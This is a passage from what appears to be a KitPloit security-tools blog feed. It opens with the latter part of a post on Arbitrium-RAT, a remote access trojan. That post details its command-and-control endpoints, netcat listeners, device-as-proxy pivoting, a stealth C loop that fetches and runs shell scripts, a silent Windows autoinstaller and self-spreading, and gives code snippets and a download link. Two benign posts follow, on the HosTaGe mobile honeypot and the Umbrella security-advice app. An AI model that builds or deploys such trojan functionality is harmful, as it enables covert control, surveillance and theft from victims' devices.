sure to extract them inside the app data folder <code>/data/data/package_name</code> or create a symbolic link inside it: <code>window.MyOrangePlugin.exec("/system/bin/ln -s ...</code></div></blockquote> <p><code>$ pip install flask flask_cors && ./runserver.sh # Python2.7</code></p> <pre><code> ├── runserver.sh<br /> ├── main.py<br /> ├── reverse_http.py<br /> ├── initProxy.py<br /> │<br /> ├── assets (src: ArbitriumClients/AndroidApp/StealthMode)<br /> │ ├── runFrame_arm64-v8a<br /> │ ├── toolbox_arm64-v8a<br /> │ ├── ... (x86, x86_64, armeabi-v7a)<br /> │<br /> │<br /> ├── JS_scripts<br /> │ ├── checkupdate.js<br /> │ ├── init.js<br /> │ ├── runshell.js<br /> │ └── StealthMode.js<br /> │<br /> ├── misc<br /> │<br /> ├── modules<br /> │ ├── discover.py<br /> │ ├── mimikatz.py<br /> │ ├── ports.py<br /> │ └── runCMD.py<br /> │<br /> └── threads<br /></code></pre> <br /><span style="font-size: large;"><b>Endpoints</b></span><br /> <blockquote> <p></p><div>The response of the API may differ depending on the platform of the device from which the trojan operates. The following part mainly explores the case of <strong>Android</strong>, because it's the most sophisticated due to the OS's restrictions.</div></blockquote> <ul> <li><strong>[GET]</strong> /checkupdate.js</li> </ul> <p>When the client sends its first request to the endpoint <code>/checkupdate.js</code>, the server creates a <code>genShell</code> object, which sets a unique local port for that device (<code>self.lport = self.setPort()</code>) and a thread id (<code>self.threaduid = random.randint</code>) in addition to other attributes. It then returns the appropriate JavaScript code (depending on the CPU/ABI), which contains instructions to download, chmod and execute (on the main thread, or via poolexec) some resources. 
For subsequent requests it returns JS code that executes the pending tasks, if there are any.</p> <p><code>runCMD</code> is a method of <code>genShell</code> that writes the shell script we want the trojan to run into a file inside <code>/assets</code>, to be downloaded later by the client, then uses netcat to listen for the response and pipe it into a file inside <code>/threads</code>.</p> <p><strong>Example</strong>: Let's say you want to use the target as an HTTP proxy; the API formulates the request as the following cmd:</p> <div><pre><code>echo -e "GET / HTTP/1.1\r\nHost: 192.168.1.1\r\nConnection: close\r\n\r\n" | {abspath_toolbox/ncat} {API_HOST_IP} {lport} -w 10;\r\n</code></pre></div> <p>It then saves it into <code>assets/runsh_{uid_task}.sh</code>, and, depending on whether the request came from StealthMode/BatteryBypass or not, <code>/checkupdate.js</code> gets the trojan to download the shell file and run it.</p> <div><pre><code>>>> Popen("exec $(nc -l 0.0.0.0 -p {lport} -dN > {task_filename})", shell=True, close_fds=True, ...)</code></pre></div> <ul> <li><strong>[GET]</strong> /addtask</li> </ul> <p>Using the appropriate token, the admin can get a device to run a command via this endpoint; the server will mark this command as <strong>pending</strong>, which affects the next response of <code>/checkupdate.js</code> to that device. It then returns a randomly generated id for this task.</p> <ul> <li><strong>[GET]</strong> /pingtask</li> </ul> <p>The combination of the task id generated by <code>/addtask</code> and the aforementioned thread id <code>threaduid</code> makes up the name of the file inside <code>/threads</code> where the output of the command is saved. 
Once this endpoint is requested it checks whether <code>/threads/{threaduid}x{taskid}</code> exists; if so, the server returns the content of the file, otherwise it returns 0.</p> <ul> <li><strong>[GET]</strong> /runproxy & /pushproxy</li> </ul> <p>This will run <code>reverse_http.py</code> in a separate screen, then return an IP:PORT (HTTP proxy) that allows the admin to pivot HTTP requests through the trojan device. For instance, if the admin sets this info in the browser settings and tries to open the router port (e.g. <code>http://192.16...</code>), the browser will open the router web interface as if the admin were part of the target LAN.</p> <ol start="2"> <li> <p><a href="https://github.com/BenChaliah/Arbitrium-Android" rel="nofollow" target="_blank" title="Client/Trojan (">Client/Trojan (<strong>Android</strong>)</a>: The app is built using Cordova for its simplicity and support for cross-platform development. This app relies on two main parts:</p> <ol> <li> <br /><b><strong>netbolt-orange-plugin</strong>:</b><br /> <p>This is a Cordova plugin I made; it contains a few functions that we can call from <code>index.html</code>. Scripts downloaded via <code>/checkupdate.js</code> mainly use these methods to run the assigned task.</p> <p> + <strong>exec()</strong> : executes a shell cmd, then returns the cmd output; it runs on the <strong>UI thread</strong></p> <p> + <strong>poolexec()</strong> : same as 'exec()', but this one uses the <code>ThreadPoolExecutor</code> so the app can run a cmd without blocking the main thread; when the output is ready, it is sent via a callback together with the exit status</p> <p> + <strong>download()</strong> : this one is for downloading whatever resources the API or the admin may want or need to execute a task</p> </li> </ol> <p><strong>Example</strong>: The trojan first requests <code>/checkupdate.js</code>; let's assume this is an Android phone and we want to initiate the <a href="https://github.com/BenChaliah/Arbitrium-RAT#stealthmode" 
rel="nofollow" target="_blank" title="StealthMode/BatteryBypass">StealthMode/BatteryBypass</a> to avoid getting killed (battery optimizations ...); the API then responds with something like:</p> <div><pre><code>function sfunc1(){<br /> window.MyOrangePlugin.download([{Link for ELF} ...], function(res){<br /> sfunc2(...);<br /> });<br />}<br />function sfunc2(...){<br /> window.MyOrangePlugin.exec("chmod ... ", function(res){<br /> sfunc3(...);<br /> });<br />}<br />function sfunc3(...){<br /> window.MyOrangePlugin.poolexec({Here we start the binary that will keep interacting with the API}, function(res){<br /> ...<br /> });<br />}</code></pre></div> <blockquote> <p>The app also uses a slightly customized version of the Cordova background mode plugin.</p> </blockquote> <ol start="2"> <li> <br /><b><strong>StealthMode</strong>:</b><br /> <p> + <strong>runFrame.c</strong> : This is a simple C program that sends HTTP requests every few seconds to the API through a socket, saves the response to a shell file, then makes a system call to run it.</p> <p> + <strong>toolbox.c</strong> : This is a standalone netcat</p> </li> </ol> <p>The resulting binaries are statically linked to ensure stability and path independence. The importance of using <code>runFrame</code> instead of just running a JS loop in <strong>index.html</strong> isn't limited to the battery issues explained previously; there are performance reasons too. 
The app in this mode uses far fewer resources and is more reliable.</p> <p>The frequency of the requests is by default set to 5s, but it can be manipulated by the API (the server automatically makes <code>runFrame</code> slow down when there are no scheduled cmds by giving it <code>sleep 30</code> as a response). Therefore, when the admin is controlling a device or using it as a proxy, a number of tasks will be scheduled and the delay between each won't be significant; otherwise we don't want the client to keep sending frequent requests, which would make it noticeable and resource-consuming.</p> <blockquote> <p></p><div>The API recognizes whether the requests are coming from this mode by the <strong>User-Agent: JustKidding</strong>, so that the responses to <code>/checkupdate.js</code> are compatible. Also, the HTTP requests are only made while the phone is connected to <strong>Wlan</strong>, and there are two main reasons for that: the first is mobile data consumption, which the OS will stop; the second is the autonomous spread capability (#AutoSpread).</div></blockquote> <div><pre><code>// void bzero(void *s, size_t n);<br />#define bzero(s, n) memset((s), 0, (n))<br />...<br />strcat(reque, "&token=updated HTTP/1.1\r\nHost: {API_Host}\r\nUser-Agent: JustKidding\r\nConnection: close\r\n\r\n");<br />char *routing = "ip route | grep wlan";<br />...<br />while (1){<br /> routingSTAT = system(routing);<br /> // grep exit status will only equal 0 if a wlan interface was listed<br /> if (routingSTAT==0){<br /> fd = socket_connect(argv[1], atoi(argv[2])); <br /> write(fd, reque, strlen(reque));<br /> bzero(buffer, BUFFER_SIZE);<br /> ...<br /> }</code></pre></div> </li> <li> <p><a href="https://github.com/BenChaliah/Arbitrium-RAT/blob/main/Clients" rel="nofollow" target="_blank" title="Client/Trojan (">Client/Trojan (<strong>Windows/Linux</strong>)</a>: Unlike in the case of Android, here a simple Python script will do. 
In addition, the Windows version is equipped with a VBA script and SFX to make a silent autoinstaller; the trojan will be just a standalone executable that runs in the background after extracting its content inside %TEMP%.</p> </li> </ol> <br /><span style="font-size: large;"><b>Screenshots</b></span><br /> <ol> <li>HTTP proxy:
<div class="separator" style="clear: both;"><a href="https://1.bp.blogspot.com/-BErV7I4iDFk/YA5A8VhvQrI/AAAAAAAAVH8/UXlGHN3nkDwsI0NZzaSQZacT39N6G-yIQCNcBGAsYHQ/s1280/Arbitrium-RAT_2.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" width="600" data-original-height="720" data-original-width="1280" src="https://1.bp.blogspot.com/-BErV7I4iDFk/YA5A8VhvQrI/AAAAAAAAVH8/UXlGHN3nkDwsI0NZzaSQZacT39N6G-yIQCNcBGAsYHQ/s600/Arbitrium-RAT_2.png"/></a></div>
</li> <li>Powershell:
<div class="separator" style="clear: both;"><a href="https://1.bp.blogspot.com/-CTHmZOYNfns/YA5BJEWiHaI/AAAAAAAAVIA/9bdjxqt5gnkgN2WX5-NKd6pvK04KEIjGwCNcBGAsYHQ/s1280/Arbitrium-RAT_3.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" width="600" data-original-height="720" data-original-width="1280" src="https://1.bp.blogspot.com/-CTHmZOYNfns/YA5BJEWiHaI/AAAAAAAAVIA/9bdjxqt5gnkgN2WX5-NKd6pvK04KEIjGwCNcBGAsYHQ/s600/Arbitrium-RAT_3.png"/></a></div>
</li> <li>Port scanner:
<div class="separator" style="clear: both;"><a href="https://1.bp.blogspot.com/-fG48jPRuIF8/YA5BPYfuV4I/AAAAAAAAVII/NMC4lgW75Fst3OG2VhvfIGOq5eDCE6ehwCNcBGAsYHQ/s1280/Arbitrium-RAT_4.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" width="600" data-original-height="720" data-original-width="1280" src="https://1.bp.blogspot.com/-fG48jPRuIF8/YA5BPYfuV4I/AAAAAAAAVII/NMC4lgW75Fst3OG2VhvfIGOq5eDCE6ehwCNcBGAsYHQ/s600/Arbitrium-RAT_4.png"/></a></div>
</li> </ol> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/BenChaliah/Arbitrium-RAT" rel="nofollow" target="_blank" title="Download Arbitrium-RAT">Download Arbitrium-RAT</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-74871803417259985552021-01-19T08:30:00.010-03:002021-01-19T08:30:03.534-03:00HosTaGe - Low Interaction Mobile Honeypot<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-ZfiRYUE8MHg/YAZj7ncs6oI/AAAAAAAAVBo/x-EIVYrL0FYWVDdvy7aVl8T9yQ2bw8QvQCNcBGAsYHQ/s730/HosTaGe_0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="730" data-original-width="349" height="640" src="https://1.bp.blogspot.com/-ZfiRYUE8MHg/YAZj7ncs6oI/AAAAAAAAVBo/x-EIVYrL0FYWVDdvy7aVl8T9yQ2bw8QvQCNcBGAsYHQ/w306-h640/HosTaGe_0.png" width="306" /></a></div><p><br /></p><p></p> <p>HosTaGe is a lightweight, low-interaction, portable, and generic <a href="https://www.kitploit.com/search/label/HoneyPot" target="_blank" title="honeypot">honeypot</a> for mobile devices that aims at the detection of malicious <a href="https://www.kitploit.com/search/label/Wireless" target="_blank" title="wireless">wireless</a> network environments. As most malware propagates over the network via specific protocols, a low-interaction honeypot located on a mobile device can check wireless networks for actively propagating malware. 
We envision such honeypots running on all kinds of mobile devices, e.g., smartphones and tablets, to provide a quick assessment of the potential security state of a network.</p> <p>HosTaGe emulates the following <a href="https://www.kitploit.com/search/label/Protocols" target="_blank" title="protocols">protocols</a> as of the latest version: AMQP, COAP, ECHO, FTP, HTTP, HTTPS, MySQL, MQTT, MODBUS, S7COMM, SNMP, SIP, SMB, SSH, SMTP and TELNET.</p><span><a name='more'></a></span><p><br /></p> <p><strong>Download from Play Store!</strong></p> <p>The stable release of HosTaGe can be installed from the Google Play Store (<a href="https://play.google.com/store/apps/details?id=dk.aau.netsec.hostage" rel="nofollow" target="_blank" title="Play Store Link">Play Store Link</a>), or scan the QR code below from your <a href="https://www.kitploit.com/search/label/Android" target="_blank" title="Android">Android</a> device.</p><p><br /></p><p style="text-align: center;"><iframe width="560" height="315" src="https://www.youtube.com/embed/nRrc2T8_oKM" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></p><p><br /></p> <p><strong>References</strong></p> <p>The <a href="https://www.kitploit.com/search/label/Research" target="_blank" title="research">research</a> behind HosTaGe has been published and presented in a number of scientific and industrial conferences. Below you can find some selected papers:</p> <p>[1] Emmanouil Vasilomanolakis, Shankar Karuppayah, Mathias Fischer, Mihai Plasoianu, Wulf Pfeiffer, Lars Pandikow, Max Mühlhäuser: This Network is Infected: HosTaGe – a Low-Interaction Honeypot for Mobile Devices. SPSM@CCS 2013:43-48</p> <p>[2] Emmanouil Vasilomanolakis, Shankar Karuppayah, Mathias Fischer, Max Mühlhäuser: HosTaGe: a Mobile Honeypot for Collaborative Defense. 
ACM SIN 2014:330-333</p> <p>[3] Emmanouil Vasilomanolakis, Shreyas Srinivasa, Max Mühlhäuser: Did you really hack a nuclear power plant? An industrial control mobile honeypot. IEEE CNS 2015:729-730</p> <p>[4] Emmanouil Vasilomanolakis, Shreyas Srinivasa, Carlos Garcia Cordero, Max Mühlhäuser: Multi-stage Attack Detection and Signature Generation with ICS Honeypots. IEEE/IFIP DISSECT@NOMS 2016:1227-1232</p> <p><strong>Download APK</strong></p> <p><a href="https://github.com/aau-network-security/HosTaGe/releases/download/v2.2.11/HosTaGe-2.2.11.apk" rel="nofollow" target="_blank" title="HosTaGe-v2.2.11.apk">HosTaGe-v2.2.11.apk</a> <a href="https://github.com/aau-network-security/HosTaGe/releases/tag/v2.2.11" rel="nofollow" target="_blank" title="Release-Notes">Release-Notes</a> (latest)</p> <p>HosTaGe-v2.1.1.apk <a href="https://github.com/aau-network-security/HosTaGe/releases/tag/v2.1.1" rel="nofollow" target="_blank" title="Release-Notes">Release-Notes</a></p> <p>HosTaGe-v2.0.0.apk <a href="https://github.com/aau-network-security/HosTaGe/releases/tag/v2.0.0" rel="nofollow" target="_blank" title="Release-Notes">Release-Notes</a></p> <p><strong>Wiki</strong></p> <p>The Wiki provides information on getting started and using the app. 
Wiki for HosTaGe can be found here: <a href="https://github.com/aau-network-security/HosTaGe/wiki/2.-Getting-Started" rel="nofollow" target="_blank" title="Wiki">Wiki</a>.</p> <p><strong>GUI</strong></p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-qbchruAcSJc/YAZkKBxmyQI/AAAAAAAAVBs/eprbW-aL25QEJAjXOOJyyCOUFezEdYNSQCNcBGAsYHQ/s740/HosTaGe_4_alert.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="740" data-original-width="350" height="640" src="https://1.bp.blogspot.com/-qbchruAcSJc/YAZkKBxmyQI/AAAAAAAAVBs/eprbW-aL25QEJAjXOOJyyCOUFezEdYNSQCNcBGAsYHQ/w302-h640/HosTaGe_4_alert.gif" width="302" /></a></div><p><br /></p> <p><strong>Original Authors</strong></p> <p><a href="https://mvasiloma.com/" rel="nofollow" target="_blank" title="Emmanouil Vasilomanolakis">Emmanouil Vasilomanolakis</a> - idea, guidance and suggestions during development</p> <p><strong>Contributors</strong></p> <p><a href="https://sastry17.github.io/" rel="nofollow" target="_blank" title="Shreyas Srinivasa">Shreyas Srinivasa</a>, lead developer, Aalborg University and Technische Universität Darmstadt (Github - @sastry17)</p> <p>Eirini Lygerou, GSoC 2020 Developer (Github - @irinil)</p> <p>Mihai Plasoianu, student developer, Technische Universität Darmstadt</p> <p>Wulf Pfeiffer, student developer, Technische Universität Darmstadt</p> <p>Lars Pandikow, student developer, Technische Universität Darmstadt</p> <p><strong>Researchers</strong></p> <p><a href="https://www.kshankar.com/" rel="nofollow" target="_blank" title="Shankar Karuppayah">Shankar Karuppayah</a>, mentoring, developer, Technische Universität Darmstadt</p> <p><a href="https://www.inf.uni-hamburg.de/inst/ab/snp/team/fischer.html" rel="nofollow" target="_blank" title="Mathias Fischer">Mathias Fischer</a>, mentoring, Universität Hamburg</p> <p><a 
href="https://www.informatik.tu-darmstadt.de/telekooperation/telecooperation_group/staff_1/staff_1_details_23168.en.jsp" rel="nofollow" target="_blank" title="Max Mühlhäuser">Max Mühlhäuser</a>, mentoring, Technische Universität Darmstadt</p> <p>Carlos Garcia Cordero, mentoring, Technische Universität Darmstadt</p> <p>Features of HoneyRJ were the inspiration for this project. <a href="http://www.cse.wustl.edu/~jain/cse571-09/ftp/honey/manual.html" rel="nofollow" target="_blank" title="http://www.cse.wustl.edu/~jain/cse571-09/ftp/honey/manual.html">http://www.cse.wustl.edu/~jain/cse571-09/ftp/honey/manual.html</a></p> <p>Encryption for the SSH protocol was taken from Ganymed SSH-2 and slightly modified. <a href="http://code.google.com/p/ganymed-ssh-2/" rel="nofollow" target="_blank" title="http://code.google.com/p/ganymed-ssh-2/">http://code.google.com/p/ganymed-ssh-2/</a></p> <p><strong>GSoC 2020</strong></p> <p>The project was actively developed with participation in Google Summer of Code 2020. More information about GSoC 2020 is available <a href="https://summerofcode.withgoogle.com/projects/#5293206515744768" rel="nofollow" target="_blank" title="here">here</a>.</p> <p><strong>HPFeeds</strong></p> <p>To access the hpfeeds from HosTaGe, please send an access request to <a href="mailto:hostage@es.aau.dk" rel="nofollow" target="_blank" title="hostage@es.aau.dk">hostage@es.aau.dk</a> with your name and organization. Please note that access to the hpfeeds repository is provided only after an internal review.</p> <p><strong>Contact</strong></p> <p>Please use the GitHub issues to report any issues or ask questions. 
<a href="https://honeynetpublic.slack.com/archives/CUCJPUE3H" rel="nofollow" target="_blank" title="Slack channel">Slack channel</a>; <a href="mailto:hostage@es.aau.dk" rel="nofollow" target="_blank" title="Email">Email</a></p> <p><br /></p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/aau-network-security/HosTaGe" rel="nofollow" target="_blank" title="Download HosTaGe">Download HosTaGe</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-29657366558314612012021-01-13T17:30:00.019-03:002021-01-13T17:30:03.539-03:00Umbrella_android - Digital And Physical Security Advice App<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-EhHAeY0R2Ws/X_uthm_p19I/AAAAAAAAU8k/JpxXwqRDChMbIWUoG06CMvOhskDPqqa2ACNcBGAsYHQ/s1383/Umbrella_android_1_howtouse.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1040" data-original-width="1383" height="482" src="https://1.bp.blogspot.com/-EhHAeY0R2Ws/X_uthm_p19I/AAAAAAAAU8k/JpxXwqRDChMbIWUoG06CMvOhskDPqqa2ACNcBGAsYHQ/w640-h482/Umbrella_android_1_howtouse.gif" width="640" /></a></div><p><br /></p> <p>Umbrella is an Android <a href="https://www.kitploit.com/search/label/Mobile%20App" target="_blank" title="mobile app">mobile app</a> developed by <a href="https://www.secfirst.org" rel="nofollow" target="_blank" title="Security First">Security First</a> that provides human rights defenders with information on what to do in any given security situation and the tools to do it. It allows the user to choose what they want to do, such as: protect data; securely make a call/email; securely access the internet; plan secure travel; protect their office/home; conduct counter-surveillance; or deal with kidnapping, arrest or evacuation. 
Once a situation is chosen, the app outlines what to do and what tools to use given your circumstances. This is followed by a simple checklist of recommended actions that can be customised, saved and shared securely. Umbrella’s Feed also provides users with an up-to-the-minute account of potential risks in their chosen location.</p><span><a name='more'></a></span><p><br /></p><span style="font-size: large;"><b>Example Usage</b></span><br /> <p>Umbrella is designed for everyone (people looking to increase their security, folks living in high-risk areas, regular travellers, business people, techies, journalists, NGO staff, aid workers, human rights defenders, social workers, environmental activists, etc).</p> <p>However, when we built Umbrella we tried to keep in mind the story of Glenn Greenwald and Edward Snowden. Greenwald couldn't communicate with Snowden at the start because he found it cumbersome to set up <a href="https://www.kitploit.com/search/label/Encryption" target="_blank" title="encryption">encryption</a> (he nearly missed one of the biggest stories of the decade because of this!). Also, when he (and Laura Poitras) travelled to Hong Kong, they didn't know much about how to meet securely with Snowden and detect surveillance. This is a common problem for journalists and activists. Umbrella is designed to solve this problem (and others) by having nearly everything they would have needed to know in one place: in their pocket.</p> <br /><span style="font-size: large;"><b>Main Parts of Umbrella</b></span><br /> <p><strong>Introduction:</strong> This is the part the user sees first. It explains briefly how the app works and the basic terms and conditions.</p> <p><strong>Menu:</strong> The bottom navigation menu is the main way for a user to navigate. 
It lists the feed, forms, lessons (with tool guides), checklists and account.</p> <p><strong>Feed:</strong> The feed contains security feeds from places like the UN Relief Web and the US Centers for Disease Control. You enter your location (and how often you want to be updated). Every time a new update is released (e.g. a disease outbreak in your location), the information comes up on the dashboard.</p> <p><strong>Lessons:</strong> Lessons are where users can learn about topics and things that they can do to improve their security. Some of the lessons have different levels (Beginner, Advanced, Expert) depending on your needs, ability, and risk. Each module is broken down into sections. At the end of each module is a list of other resources and further reading.</p> <p><strong>Tool Guides:</strong> These are detailed guides about how to use software and apps mentioned in the lessons.</p> <p><strong>Checklists:</strong> Checklists are quick and easy references to help users implement the advice in the lessons. You can tick them off as you complete each item. Items can be edited. You may also create custom checklists. If you start ticking a checklist, you will then see it on the Checklists page. Checklists can also be shared through other apps such as your email.</p> <p><strong>Forms:</strong> Forms allow a user to quickly fill out and share important information about issues such as their travel plan in a high-risk location or report on a digital/physical security incident.</p> <br /><span style="font-size: large;"><b>Lessons</b></span><br /> <p>The general flow of lessons is presented in order to replicate the typical way that a user works. 
Protecting their information -> Communicating with other people -> Arranging and travelling to a location -> Doing their operations and work -> Dealing with personal issues that may arise -> Seeking support if something goes wrong.</p> <p><em><strong>These are the lessons currently in Umbrella.</strong></em></p> <br /><b>Assess your risk</b><br /> <ul> <li>Security Planning</li> </ul> <br /><b>Information</b><br /> <p>These lessons mostly cover the security of information that is stored on your computers.</p> <ul> <li>Managing information</li> <li>Malware</li> <li>Passwords</li> <li>Protecting Files</li> <li>Safely Deleting</li> <li>Backing Up</li> <li>Protect your workplace</li> <li>Workplace raids</li> </ul> <br /><b>Communications</b><br /> <p>These lessons mostly cover the security of information when it is sent or received.</p> <ul> <li>Mobile Phones</li> <li>Making a call</li> <li>Sending a message</li> <li>Email</li> <li>Censorship</li> <li>Online Privacy</li> <li>Phishing</li> <li>Radios and <a href="https://www.kitploit.com/search/label/Satellite" target="_blank" title="satellite">satellite</a> phones</li> <li>Online abuse</li> </ul> <br /><b>Travel</b><br /> <p>These lessons cover the security of travelling in high-risk areas.</p> <ul> <li>Preparation</li> <li>Borders</li> <li>Vehicles</li> <li>Checkpoints</li> <li>Protective Equipment</li> </ul> <br /><b>Work</b><br /> <p>These lessons include topics that may affect you in your work.</p> <ul> <li>Meetings</li> <li>Being followed</li> <li>Protests</li> <li>Dangerous Assignments</li> <li>Public Assignments</li> <li>Public Communications</li> <li>Whistleblowers</li> </ul> <br /><b>Incident Response</b><br /> <p>These lessons cover how to respond to events.</p> <ul> <li>Arrests</li> <li>Evacuation</li> <li>Kidnapping</li> <li>Sexual Assault</li> <li>Terrorism</li> </ul> <br /><b>Stress</b><br /> <ul> <li>Stress</li> </ul> <br /><b>Emergency Support</b><br /> <p>Explains places to get extra help if you have a 
problem.</p> <ul> <li>Physical</li> <li>Digital</li> </ul> <br /><b>Tools</b><br /> <p>These are detailed guides about how to use software and apps mentioned in the lessons. These are the tools currently covered in the tool guide.</p> <ul> <li>Messaging <ul> <li>Mailvelope</li> <li>ObscuraCam</li> <li>Pidgin</li> <li>Psiphon</li> <li>Signal for Android</li> <li>Signal for iOS</li> </ul> </li> <li>Encryption <ul> <li>Encrypt your iPhone</li> <li>k9 & Open Keychain</li> <li>KeePassXC</li> </ul> </li> <li>PGP <ul> <li>PGP for Linux</li> <li>PGP for MacOS</li> <li>PGP for Windows</li> </ul> </li> <li>Tor <ul> <li>Orbot & Orfox</li> <li>Tor for MacOS</li> <li>Tor for Linux</li> <li>Tor for Windows</li> </ul> </li> <li>Files <ul> <li>Cobian Backup</li> <li>Recuva</li> <li>VeraCrypt</li> </ul> </li> <li>Other <ul> <li>Android</li> <li>Facebook</li> </ul> </li> </ul> <br /><span style="font-size: large;"><b>Glossary</b></span><br /> <p>Contains explanations of the various terms used in the app.</p> <br /><span style="font-size: large;"><b>About</b></span><br /> <p>Explains the licences that apply to Umbrella and to the software it uses. 
Also says a big THANK YOU to everyone whose work we built on to make it happen.</p> <br /><span style="font-size: large;"><b>Dashboard Feed Sources</b></span><br /> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-PWnX1LxJLRI/X_utp1ZebOI/AAAAAAAAU8o/CxhL6vwYloQaKBdJxu-CPOjLSM97UWtigCNcBGAsYHQ/s1000/Umbrella_android_6_DASHBOARDLOGOS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="750" data-original-width="1000" height="480" src="https://1.bp.blogspot.com/-PWnX1LxJLRI/X_utp1ZebOI/AAAAAAAAU8o/CxhL6vwYloQaKBdJxu-CPOjLSM97UWtigCNcBGAsYHQ/w640-h480/Umbrella_android_6_DASHBOARDLOGOS.png" width="640" /></a></div><p><br /></p> <p>These are the sources that we currently include for <a href="https://www.kitploit.com/search/label/Real-Time" target="_blank" title="real-time">real-time</a> security feeds. For privacy reasons, users never connect directly to these services. We are always looking for more useful sources that will help users keep updated on the move.</p> <ul> <li><a href="http://reliefweb.int" rel="nofollow" target="_blank" title="ReliefWeb / UN">ReliefWeb / UN</a>: excellent physical security updates that amalgamate information from the UN and various NGOs - though not available in every country</li> <li><a href="https://www.gov.uk/government/organisations/foreign-commonwealth-office" rel="nofollow" target="_blank" title="Foreign and Commonwealth Office">Foreign and Commonwealth Office</a>: foreign travel advice, consular help and services abroad and document legislation</li> <li><a href="https://www.cdc.gov" rel="nofollow" target="_blank" title="Centers for Disease Control">Centers for Disease Control</a>: updates on disease and health warnings</li> <li><a href="http://www.gdacs.org" rel="nofollow" target="_blank" title="Global Disaster Alert and Coordination System">Global Disaster Alert and Coordination System</a>: updates on natural 
disaster issues such as floods, earthquakes and tsunamis</li> <li><a href="https://www.state.gov/travel/" rel="nofollow" target="_blank" title="US State Department Country Warnings">US State Department Country Warnings</a>: updates mainly focused on the security situation for travellers and internationals - available for every country</li> </ul> <br /><span style="font-size: large;"><b>Account</b></span><br /> <p>Navigate to "Account" from the bottom menu. Here you can:</p> <ul> <li>Modify settings (feed interval, feed location, feed sources, notifications, connections, import data, export data)</li> <li>Enable Mask</li> <li>Set a password</li> <li>Log out</li> </ul> <br /><span style="font-size: large;"><b>Requirements</b></span><br /> <p>You need an Android phone with a minimum version of 4.0.3 (SDK 15 - ICE_CREAM_SANDWICH_MR1).</p> <br /><span style="font-size: large;"><b>Contributing Bug reports</b></span><br /> <p>Unfortunately, stuff breaks sometimes. If you are in a hurry and have found a code or content problem then please email it to <a href="mailto:support@secfirst.org" rel="nofollow" target="_blank" title="support@secfirst.org">support@secfirst.org</a>. If you have a little more time we generally try to manage any bugs using GitHub. 
Please search the existing issues for your bug and create a new one if the issue is not yet tracked.</p> <p><a href="https://github.com/securityfirst/Umbrella_android/issues" rel="nofollow" target="_blank" title="https://github.com/securityfirst/Umbrella_android/issues">https://github.com/securityfirst/Umbrella_android/issues</a></p> <p>If the issue you have identified is a security risk to users, please read the documentation about our responsible disclosure policy here:</p> <p><a href="https://secfirst.org/legal" rel="nofollow" target="_blank" title="https://secfirst.org/legal">https://secfirst.org/legal</a></p> <p>If you wish to contact us via PGP, please drop a mail to <a href="mailto:rory@secfirst.org" rel="nofollow" target="_blank" title="rory@secfirst.org">rory@secfirst.org</a> (2C1D3B4D)</p> <p><a href="https://pgp.mit.edu/pks/lookup?op=vindex&search=0xFFB9B5BE2C1D3B4D" rel="nofollow" target="_blank" title="https://pgp.mit.edu/pks/lookup?op=vindex&search=0xFFB9B5BE2C1D3B4D">https://pgp.mit.edu/pks/lookup?op=vindex&search=0xFFB9B5BE2C1D3B4D</a></p> <p><strong>Contributing Ideas</strong></p> <p>Ideas are powerful things! If you have any about what we could do better or things which you think we should do in the future, please email us at <a href="mailto:info@secfirst.org" rel="nofollow" target="_blank" title="info@secfirst.org">info@secfirst.org</a>.</p> <br /><span style="font-size: large;"><b>Contributing Code</b></span><br /> <p>We have a really big development plan of functionality we want to include in the future and are currently in the process of building a way to manage contributions from the open source community. Until we have that up please drop us a mail at <a href="mailto:info@secfirst.org" rel="nofollow" target="_blank" title="info@secfirst.org">info@secfirst.org</a> if you are interested in contributing a specific part of future code. 
If there is something you want to help out with in the interim, then here is some basic advice:</p> <ol> <li> <p>Fork it!</p> </li> <li> <p>Create your feature branch: <code>git checkout -b my-new-feature</code></p> </li> <li> <p>Commit your changes: <code>git commit -am 'Add some feature'</code></p> </li> <li> <p>Push to the branch: <code>git push origin my-new-feature</code></p> </li> <li> <p>Submit a pull request :D</p> </li> </ol> <p><strong>Build Instructions</strong></p> <p><a href="https://github.com/securityfirst/Umbrella_android/blob/master/BUILD.md" rel="nofollow" target="_blank" title="Build it yourself">Build it yourself</a></p> <br /><b>Contributors</b><br /> <p>Thanks to everyone who has contributed code to Umbrella. It wouldn’t have happened without you.</p> <ul> <li> <p><a href="https://github.com/Coccodrillo" rel="nofollow" target="_blank" title="Rok Biderman – Security First Lead Developer">Rok Biderman – Security First Lead Developer</a></p> </li> <li> <p><a href="https://github.com/VesnaPlanko" rel="nofollow" target="_blank" title="Vesna Planko – Security First Lead UI/UX Designer">Vesna Planko – Security First Lead UI/UX Designer</a></p> </li> <li> <p><a href="https://github.com/klaidliadon" rel="nofollow" target="_blank" title="Alex Guerrieri – Security First Developer">Alex Guerrieri – Security First Developer</a></p> </li> <li> <p><a href="https://github.com/krzd" rel="nofollow" target="_blank" title="Adam Hani Schakaki – Security First Developer">Adam Hani Schakaki – Security First Developer</a></p> </li> </ul> <p><strong>Cryptography Notice</strong></p> <p>This distribution includes cryptographic software. The country in which you currently reside may have <a href="https://www.kitploit.com/search/label/Restrictions" target="_blank" title="restrictions">restrictions</a> on the import, possession, use, and/or re-export to another country, of encryption software. 
